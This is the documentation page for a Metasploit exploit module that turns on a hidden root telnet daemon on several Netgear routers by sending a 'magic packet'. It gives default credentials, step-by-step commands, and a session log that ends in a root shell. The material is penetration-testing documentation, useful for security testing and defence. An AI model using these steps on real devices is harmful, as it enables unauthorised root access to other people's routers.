metasploit-gs/documentation/modules/exploit/linux/telnet/netgear_telnetenable.md

Intro

Several models of Netgear devices have a hidden telnet daemon that can be enabled for remote LAN users by sending a 'magic packet' to the device. Upon successful connect, a root shell should be presented to the user.

There are many devices which contain this daemon, for a full list see OpenWrt

This module has been successfully tested against:

• AC1450 in whatever version I bought it with (TCP)
• AC1450 latest V1.0.0.36_10.0.17 (UDP)
• N300 WNR2000 v3 (TCP)

Setup

A MAC address is required for exploitation. To determine the MAC address of the device:

1. Ping the device to force an ARP lookup: ping -c 1 [IP]
2. Get the MAC: arp -an [IP]

Targets

0 (Automatic)

Detect if a device listens on TCP or UDP.

1 (TCP)

Older devices usually listen on TCP.

2 (UDP)

Newer devices usually listen on UDP.

Options

MAC

Set this to the MAC address of the device. You can use ping and arp to find it.

USERNAME

If this is an older device, it'll take the value of super_username in nvram. Gearguy is usually correct.

If this is a newer device, it'll take the web UI username, which is usually unchanged from admin.

PASSWORD

If this is an older device, it'll take the value of super_passwd in nvram. Geardog is usually correct.

If this is a newer device, it'll take the web UI password, which is usually unchanged from password.

VERBOSE

This will display the username and password used in the magic packet.

Exploitation

1. Make sure you have a vulnerable device
2. Start metasploit
3. use exploit/linux/telnet/netgear_telnetenable
4. set rhost [IP]
5. set mac [MAC Address]
6. exploit
7. Enjoy a root shell!

Usage

msf5 > use exploit/linux/telnet/netgear_telnetenable
msf5 exploit(linux/telnet/netgear_telnetenable) > set rhost 192.168.1.1
rhost => 192.168.1.1
msf5 exploit(linux/telnet/netgear_telnetenable) > ping -c 1 192.168.1.1
[*] exec: ping -c 1 192.168.1.1

PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data.
64 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=1.19 ms

--- 192.168.1.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 1.198/1.198/1.198/0.000 ms
msf5 exploit(linux/telnet/netgear_telnetenable) > arp -an 192.168.1.1
[*] exec: arp -an 192.168.1.1

? (192.168.1.1) at [redacted] [ether] on wlan0
msf5 exploit(linux/telnet/netgear_telnetenable) > set mac [redacted]
mac => [redacted]
msf5 exploit(linux/telnet/netgear_telnetenable) > set verbose true
verbose => true
msf5 exploit(linux/telnet/netgear_telnetenable) > run

[+] 192.168.1.1:23 - Detected telnetenabled on UDP
[*] 192.168.1.1:23 - Using creds admin:password
[*] 192.168.1.1:23 - Generating magic packet
[*] 192.168.1.1:23 - Connecting to telnetenabled
[*] 192.168.1.1:23 - Sending magic packet
[*] 192.168.1.1:23 - Disconnecting from telnetenabled
[*] 192.168.1.1:23 - Waiting for telnetd
[*] 192.168.1.1:23 - Connecting to telnetd
[*] Found shell.

id
id
uid=0 gid=0(root)
# uname -a
uname -a
Linux (none) 2.6.36.4brcmarm+ #16 SMP PREEMPT Wed Mar 22 15:02:38 CST 2017 armv7l unknown
#

If you've already exploited TelnetEnable, the exploit will attempt to connect to telnetd directly. This saves us from sending the magic packet again.

msf5 exploit(linux/telnet/netgear_telnetenable) > run

[+] 192.168.1.1:23 - Detected telnetd on TCP
[*] 192.168.1.1:23 - Connecting to telnetd
[*] Found shell.